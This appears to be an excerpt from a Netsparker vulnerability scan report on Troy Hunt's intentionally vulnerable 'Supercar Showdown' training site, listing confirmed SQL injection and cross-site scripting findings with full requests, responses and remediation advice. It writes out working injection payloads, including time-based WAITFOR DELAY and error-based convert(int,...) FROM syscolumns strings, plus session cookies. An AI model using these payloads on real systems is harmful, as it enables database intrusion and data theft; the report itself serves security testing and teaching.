User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters
Parameter    Type    Value
nsextt       GET     "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Certainty

Request
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
5 TOTAL | CRITICAL | 5 CONFIRMED

1. Blind SQL Injection
Netsparker identified a blind SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL injection.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
- OWASP SQL injection
- SQL injection Cheat sheet
Remedy References
- MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
1.1 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters
Parameter | Type | Value
orderby | GET | 1 WAITFOR DELAY '0:0:25'--
Request
GET /Make/1?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:00:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Nissans - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.2 /Supercar/Leaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27-
Parameters
Parameter | Type | Value
orderBy | GET | 1 WAITFOR DELAY '0:0:25'--
asc | GET | false
Request
GET /Supercar/Leaderboard?orderBy=1+WAITFOR+DELAY+%270%3a0%3a25%27--&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:16:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2885
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Supercar Leaderboard - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.3 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters
Parameter | Type | Value
orderby | GET | 1 WAITFOR DELAY '0:0:25'--
Request
GET /Make/3?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:06:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Paganis - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.4 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters
Parameter | Type | Value
orderby | GET | 1 WAITFOR DELAY '0:0:25'--
Request
GET /Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27-- HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 23:03:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 1811
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>McLarens - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1.5 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | ') WAITFOR DELAY '0:0:25'--
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 68
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27)+WAITFOR+DELAY+%270%3a0%3a25%27--
Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:21:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
5 TOTAL | CRITICAL | 5 CONFIRMED

2. SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following types of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
- OWASP SQL injection
- SQL injection Cheat sheet
Remedy References
- MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter | Type | Value
userId | POST | 1
supercarId | POST | 3
comments | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27
Response
…P.NET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters
Parameter | Type | Value
orderBy | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc | GET | false
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
